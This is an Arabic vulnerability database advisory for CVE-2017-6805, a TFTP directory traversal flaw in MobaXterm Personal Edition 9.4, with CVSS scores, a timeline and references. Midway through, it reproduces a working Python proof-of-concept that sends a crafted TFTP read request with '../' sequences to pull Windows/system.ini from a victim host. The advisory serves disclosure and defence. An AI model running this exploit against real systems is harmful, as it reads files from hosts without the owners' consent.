MobaXterm Personal Edition 9.4 tftp اجتياز الدليل

CVSS الدرجة المؤقتة للميتاسعر الإكسبلويت الحالي (≈)درجة اهتمام CTI
5.4$0-$5k0.00

الملخصالمعلومات

تم أكتشاف ثغرة أمنية في MobaXterm Personal Edition 9.4. وقد تم تصنيفها على أنها خطيرة. الثغرة الأمنية متواجدة في دالة غير معروفة من العنصر tftp. تؤدي عملية التلاعب إلى اجتياز الدليل. أسم الثغرة الأمنية هوCVE-2017-6805. الهجوم يمكن أن يتم عن بُعد. أيضًا، هناك استغلال متوفر.

التفاصيلالمعلومات

تم أكتشاف ثغرة أمنية في MobaXterm Personal Edition 9.4. وقد تم تصنيفها على أنها خطيرة. الثغرة الأمنية متواجدة في دالة غير معروفة من العنصر tftp. تؤدي عملية التلاعب إلى اجتياز الدليل. عند استخدام CWE لتحديد المشكلة، سيتم التوجيه إلى CWE-22. تم اكتشاف الثغرة في 12/03/2017. تم الإعلان عن الثغرة 13/03/2017 من قبل John Page (hyp3rlinx) تحت CVE-2017-6805 MobaXterm Personal Edition v9.4 Directory Traversal File Disclosure كنوع Mailinglist Post (Full-Disclosure). يمكن عرض الاستشارة من هنا seclists.org. تم نشر هذه البيانات من دون علم الشركة المالكة.

أسم الثغرة الأمنية هوCVE-2017-6805. تم تعيين CVE في 10/03/2017. الهجوم يمكن أن يتم عن بُعد. لا يوجد شرح تقني متاح. هذه الثغرة ليست شائعة مقارنة بالمتوسط. أيضًا، هناك استغلال متوفر. تم الكشف عن الاستغلال للعامة وقد يتم استخدامه. مشروع ميتري اتاك يصنف اسلوب الهجوم هذا على انه T1006.

إذا تم تحديد إثبات المفهوم، فإنه يُعلن كـ إثبات المفهوم. تستطيع تحميل الإكسبلويت من هنا seclists.org. لكونها ثغرة هجوم فوري متوسط سعرها كان$0-$5k. الكود المستخدم في الاستغلال هو:

import sys,socket

print 'MobaXterm TFTP Directory Traversal 0day Exploit' print 'Read Windows/system.ini' print 'hyp3rlinx \n'

HOST = raw_input("[IP]>") FILE = 'Windows/system.ini' PORT = 69

PAYLOAD = "\x00\x01" #TFTP Read PAYLOAD += "../" * 4 + FILE + "\x00" #Read system.ini using directory traversal PAYLOAD += "netascii\x00" #TFTP Type

s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s.sendto(PAYLOAD, (HOST, PORT)) out = s.recv(1024) s.close()

print "Victim Data located on : %s " %(HOST) print out.strip()

جاء في التحذير ما يلي:

Vendor Notification: No Reply

في حال وجود عناصر في source_databases_list، فإن هذه الثغرة موثقة أيضًا في قواعد بيانات ثغرات أخرى: SecurityFocus (BID 96886).

منتجالمعلومات

النوع

الأسم

النسخة

CPE 2.3المعلومات

CPE 2.2المعلومات

فيديو

CVSSv4المعلومات

VulDB متجه: 🔍
VulDB الاعتمادية: 🔍

CVSSv3المعلومات

VulDB الدرجة الأساسية للميتا: 5.9
VulDB الدرجة المؤقتة للميتا: 5.6

VulDB الدرجة الأساسية: 6.5
VulDB الدرجة المؤقتة: 5.9
VulDB متجه: 🔍
VulDB الاعتمادية: 🔍

NVD الدرجة الأساسية: 5.3
NVD متجه: 🔍

CVSSv2المعلومات

AVACAuCIA
💳💳💳💳💳💳
💳💳💳💳💳💳
💳💳💳💳💳💳
متجهالتعقيدتوثيقالسريةالأمانةالتوفر
افتحافتحافتحافتحافتحافتح
افتحافتحافتحافتحافتحافتح
افتحافتحافتحافتحافتحافتح

VulDB الدرجة الأساسية: 🔍
VulDB الدرجة المؤقتة: 🔍
VulDB الاعتمادية: 🔍

NVD الدرجة الأساسية: 🔍

استغلالالمعلومات

الفئة: اجتياز الدليل
CWE: CWE-22
CAPEC: 🔍
ATT&CK: 🔍

ملموس: لا
محلي: لا
عن بُعد: نعم

التوفر: 🔍
وصول: عام
الحالة: إثبات المفهوم
المؤلف: John Page
تحميل: 🔍

EPSS Score: 🔍
EPSS Percentile: 🔍

تقدير السعر: 🔍
تقدير السعر الحالي: 🔍

0-Dayافتحافتحافتحافتح
اليومافتحافتحافتحافتح

Exploit-DB: 🔍

استخبارات التهديدالمعلومات

الاهتمام: 🔍
الفاعلون النشطون: 🔍
مجموعات APT النشطة: 🔍

إجراءات مضادةالمعلومات

التوصية: لا يوجد تخفيف معروف
الحالة: 🔍

زمن الهجوم الفوري: 🔍
وقت تأخير الاستغلال: 🔍

الجدول الزمنيالمعلومات

10/03/2017 🔍
12/03/2017 +2 أيام 🔍
13/03/2017 +1 أيام 🔍
13/03/2017 +0 أيام 🔍
13/03/2017 +0 أيام 🔍
17/03/2017 +4 أيام 🔍
20/03/2017 +3 أيام 🔍
09/09/2020 +1269 أيام 🔍

المصادرالمعلومات

استشارة: CVE-2017-6805 MobaXterm Personal Edition v9.4 Directory Traversal File Disclosure
باحث: John Page (hyp3rlinx)
الحالة: غير معرفة

CVE: CVE-2017-6805 (🔍)
GCVE (CVE): GCVE-0-2017-6805
GCVE (VulDB): GCVE-100-98210
SecurityFocus: 96886 - MobaXterm Personal Edition CVE-2017-6805 Directory Traversal Vulnerability
OSVDB: - CVE-2017-6805 - MobaXterm Personal Edition - Directory Traversal Issue

scip Labs: https://www.scip.ch/en/?labs.20161013

إدخالالمعلومات

تم الإنشاء: 17/03/2017 08:07 AM
تم التحديث: 09/09/2020 02:47 PM
التغييرات: 17/03/2017 08:07 AM (71), 09/09/2020 02:47 PM (5)
كامل: 🔍
Cache ID: 216::103

If you want to get best quality of vulnerability data, you may have to visit VulDB.

مناقشة

لا توجد تعليقات بعد اللغات: ar + fa + en.

يرجى تسجيل الدخول حتى تتمكن من التعليق

Interested in the pricing of exploits?

See the underground prices here!